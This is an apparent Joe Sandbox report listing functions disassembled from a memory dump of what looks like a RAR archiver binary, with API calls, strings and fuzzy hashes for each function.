Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
Instruction Fuzzy Hash: D951533760874186EB20DB15E48056AB7B4FB84794F900236EBAE43BD9DF3CD546CB50

Function 00007FF7F7ECBC8C Relevance: 9.1, APIs: 6, Instructions: 113timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7EA6754: GetVersionExW.KERNEL32 ref: 00007FF7F7EA6785

FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7F7ECBCEF
FileTimeToSystemTime.KERNEL32 ref: 00007FF7F7ECBCFB
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 00007FF7F7ECBD0B
SystemTimeToFileTime.KERNEL32 ref: 00007FF7F7ECBD19
SystemTimeToFileTime.KERNEL32 ref: 00007FF7F7ECBD27
FileTimeToSystemTime.KERNEL32 ref: 00007FF7F7ECBD68

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction ID: 9835ce213e80b78b4bc7d298e885a08c2a3106f901096754cf3c72dcc3c1c8bc
Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
Instruction Fuzzy Hash: 3451BCBAB106518AEB44DFB4D8405AC77B0F708788B90403ADE2E57B88DF3CD546CB50

Function 00007FF7F7ECC254 Relevance: 9.1, APIs: 6, Instructions: 81timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF7F7ECC2B8

Part of subcall function 00007FF7F7EA6754: GetVersionExW.KERNEL32 ref: 00007FF7F7EA6785

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF7F7ECC2DA
FileTimeToSystemTime.KERNEL32 ref: 00007FF7F7ECC2E6
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF7F7ECC2F6
SystemTimeToFileTime.KERNEL32 ref: 00007FF7F7ECC304
SystemTimeToFileTime.KERNEL32 ref: 00007FF7F7ECC312

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
Instruction ID: 8db55ebacc04ad3cfce5f88795a8f9e7fe5f5cae8785454c8fa1dc3d91c30ae1
Opcode Fuzzy Hash: 41967c4cfece844e9e60fb7580ce40b35ceb9cc7a7776e0bae41eece92730556
Instruction Fuzzy Hash: 81314F66B14651C9FB00DFB4D8401BC7770FB08758B945026DE1E97AA8EF38D596C360

Function 00007FF7F7EBEB40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7E872C4: new.LIBCMT ref: 00007FF7F7E873DE

new.LIBCMT ref: 00007FF7F7EBEBB4

Strings

sfx, xrefs: 00007FF7F7EBECC9
exe, xrefs: 00007FF7F7EBECDC
rebuilt., xrefs: 00007FF7F7EBECA3
rar, xrefs: 00007FF7F7EBECF2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID: exe$rar$rebuilt.$sfx
API String ID: 0-13699710
Opcode ID: 6360e25de1dba6ae756d2c5481916c9a96ad9c3a96a58d2962cf1e33d7e7eddd
Instruction ID: 883f28b8de7369cc755080301428c564241033c0ba0be72aa5f1052159dc35d1
Opcode Fuzzy Hash: 6360e25de1dba6ae756d2c5481916c9a96ad9c3a96a58d2962cf1e33d7e7eddd
Instruction Fuzzy Hash: 24819A29A0C6C245EB20FB68D4512F99792FB85384FC04137D96F476CADE6DD507C7A0

Function 00007FF7F7EDE0C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

abort.LIBCMT ref: 00007FF7F7EDE0F4
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF7F7EDE1BC
RtlUnwindEx.KERNEL32 ref: 00007FF7F7EDE20B

Strings

f, xrefs: 00007FF7F7EDE13A
csm, xrefs: 00007FF7F7EDE1A2

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabort
String ID: csm$f
API String ID: 3913153233-629598281
Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction ID: 857df8ed28fb78b212493071ff6c534ec4bc931e45bc3bce2e3c5daf0279a413
Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
Instruction Fuzzy Hash: 2F61CA39B0554286EB14EB11E488A79B791FB44794F984536DEAB077C4EF3CE842C7A0

Function 00007FF7F7E9EA18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

GetFileSecurityW.ADVAPI32(?,00007FF7F7E9EBC2), ref: 00007FF7F7E9EA7C
GetFileSecurityW.ADVAPI32(?,00007FF7F7E9EBC2), ref: 00007FF7F7E9EABC
GetSecurityDescriptorLength.ADVAPI32(?,00007FF7F7E9EBC2), ref: 00007FF7F7E9EB0A

Strings

ACL, xrefs: 00007FF7F7E9EB39
, xrefs: 00007FF7F7E9EAE3

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Security$File$DescriptorLength
String ID: $ACL
API String ID: 2361174398-1852320022
Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction ID: 15065335cf930748e218b4f6aad0efec11dc0a880c14e2d6051628738ca4955b
Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
Instruction Fuzzy Hash: 6F31886AB19A8191E720FB11E4507E9A3A5FB88784FC04132DA9E43BD5DF3CE607C790

Function 00007FF7F7E87188 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

CompareStringOrdinal.KERNEL32 ref: 00007FF7F7E8722B

Part of subcall function 00007FF7F7EA6754: GetVersionExW.KERNEL32 ref: 00007FF7F7EA6785

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF7F7E868EB), ref: 00007FF7F7E871CB
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF7F7E868EB), ref: 00007FF7F7E871E0

Strings

kernel32.dll, xrefs: 00007FF7F7E871C4
CompareStringOrdinal, xrefs: 00007FF7F7E871D6

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressCompareHandleModuleOrdinalProcStringVersion
String ID: CompareStringOrdinal$kernel32.dll
API String ID: 2522007465-2120454788
Opcode ID: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
Instruction ID: a70f9ce732d0371e699715afc5f38b9880575ecbeda2b7004582256e9922c26e
Opcode Fuzzy Hash: 824e27df19e18241d1aa3afc9b2dae14d8d279d2568df75994383969d477b6a0
Instruction Fuzzy Hash: 5C217F69A4D68281E750BB91AD44178E3A0BF54B90FD44136EE7F43BE4EF2CE45783A0

Function 00007FF7F7ECBE3C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F7ECBC8C: FileTimeToLocalFileTime.KERNEL32 ref: 00007FF7F7ECBCEF
Part of subcall function 00007FF7F7ECBC8C: FileTimeToSystemTime.KERNEL32 ref: 00007FF7F7ECBD68

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7ECBEAE
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7F7ECBED8

Strings

????-??-?? ??:??, xrefs: 00007FF7F7ECBEDF
%u-%02u-%02u %02u:%02u, xrefs: 00007FF7F7ECBEB8
%u-%02u-%02u %02u:%02u:%02u,%09u, xrefs: 00007FF7F7ECBE80

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: Time$File$swprintf$LocalSystem
String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
API String ID: 1364621626-1794493780
Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction ID: 1ec7a2aea86090f481ca4da22b000017cb39f9942146985df10136f32352bb16
Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
Instruction Fuzzy Hash: F521F97AA182418EE750DF64E440A9DB7F0F748798F944032EE5993B89DB3DD941CF50

Function 00007FF7F7EE24D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7F7EE24F4
GetProcAddress.KERNEL32 ref: 00007FF7F7EE250A
FreeLibrary.KERNEL32 ref: 00007FF7F7EE252F

Strings

mscoree.dll, xrefs: 00007FF7F7EE24EB
CorExitProcess, xrefs: 00007FF7F7EE2503

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
Instruction ID: ab385ccf57f34cab39d04a49ca5c12180055683675254416233a92e3f4bfdc1e
Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
Instruction Fuzzy Hash: 93F0A429A19A4281EF44AF10F4502B9A360AF88780FC41036E97F42BE4EE3CD44AC361

Function 00007FF7F7EEC654 Relevance: 7.8, APIs: 5, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction ID: 946ec16e43a124225eea4acba7fb4541387762ee14554fea300ce79f5ec615a5
Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
Instruction Fuzzy Hash: 48A11D66B4878245FB60AF648000379A791AF44BA4FC64A37D97F067E5EF3CD44683A2

Function 00007FF7F7EE7AB4 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F7EE7AF9

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
Instruction ID: 17db7144cf6b84ae079edf5005b4184799b494e744c9c580d063b94c20fd9a9d
Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
Instruction Fuzzy Hash: F081042AE1864285F710AB65D4806BCA7A5BB49B54FC24937DD2F037D1CF3CA4A7C362

Function 00007FF7F7EE7428 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF7F7EE7C5B), ref: 00007FF7F7EE7485
WideCharToMultiByte.KERNEL32 ref: 00007FF7F7EE7561
WriteFile.KERNEL32 ref: 00007FF7F7EE7587
WriteFile.KERNEL32 ref: 00007FF7F7EE75C6
GetLastError.KERNEL32 ref: 00007FF7F7EE75FE

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
Instruction ID: 7486b2219125fb1a673c06063ca725eb504758f6ecb4e758fb37371e8b5536e9
Opcode Fuzzy Hash: 96f561c31132e0ea19a5ef4c1750fe83e0f57ac60b3e80aac86a7179c63ec212
Instruction Fuzzy Hash: 7A51E336A14A528AE710DB25D4403ACBBB0BB48798F858536CE2A47B98DF3CD156C761

Function 00007FF7F7E980C0 Relevance: 7.6, APIs: 5, Instructions: 118fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7F7E9814D
CharToOemA.USER32 ref: 00007FF7F7E981D8
WriteFile.KERNEL32 ref: 00007FF7F7E981FB
GetStdHandle.KERNEL32 ref: 00007FF7F7E98242
WriteConsoleW.KERNEL32 ref: 00007FF7F7E98266

Part of subcall function 00007FF7F7ECD840: WideCharToMultiByte.KERNEL32 ref: 00007FF7F7ECD871

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226831993.00007FF7F7F09000.00000008.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F0A000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F14000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F1E000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226860022.00007FF7F7F26000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226967419.00007FF7F7F28000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2227001008.00007FF7F7F2E000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff7f7e80000_rar.jbxd

Similarity

API ID: CharHandleWrite$ByteConsoleFileMultiWide
String ID:
API String ID: 643171463-0
Opcode ID: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction ID: 58cd4caddeba033a629b33dedc92fc530f42cbe3f2781244110a52d7eae9a799
Opcode Fuzzy Hash: 654297ad72194e14295c68420ac164d852ec9683f320a24142875de6632070b4
Instruction Fuzzy Hash: 8F41AA69E0964281EB10BB21A9102B9A3A1BF457B0F844336D97F177D5DE3C9457C7A0

Function 00007FF7F7EE69B4 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF7F7EE6AD6

Memory Dump Source

Source File: 00000044.00000002.2226704450.00007FF7F7E81000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7F7E80000, based on PE: true

Associated: 00000044.00000002.2226679199.00007FF7F7E80000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226760663.00007FF7F7EF0000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000044.00000002.2226791462.00007FF7F7F08000.00000004.00000001.01000000.0000001B.sdmpDownload File
